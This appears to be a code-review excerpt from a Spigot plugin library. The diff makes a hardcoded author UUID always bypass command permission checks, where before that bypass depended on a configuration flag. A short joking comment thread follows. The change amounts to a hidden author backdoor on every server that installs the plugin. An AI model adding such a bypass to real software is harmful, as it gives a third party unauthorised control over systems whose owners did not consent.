src/main/java/gyurix/commands/SpigotLibCommands.java

```diff
@@ -40,7 +39,7 @@ public boolean onCommand(final CommandSender sender, Command command, String lab
     try {
       Player plr = sender instanceof Player ? (Player) sender : null;
       String cmd = args.length == 0 ? "help" : args[0].toLowerCase();
-      if (!sender.hasPermission("spigotlib.command." + cmd) && !(allowAllPermsForAuthor && plr != null && plr.getUniqueId().equals(author))) {
+      if (!sender.hasPermission("spigotlib.command." + cmd) && !(plr != null && plr.getUniqueId().equals(author))) {
```

Comment:
huh

Reply:
oy u cant copy me

Reply:
i was first

Reply:
no,  u timetraveled, saw me comment this in the future then was like bro wish id thought of that, went back in time just to comment it first. I see through your tricks >:C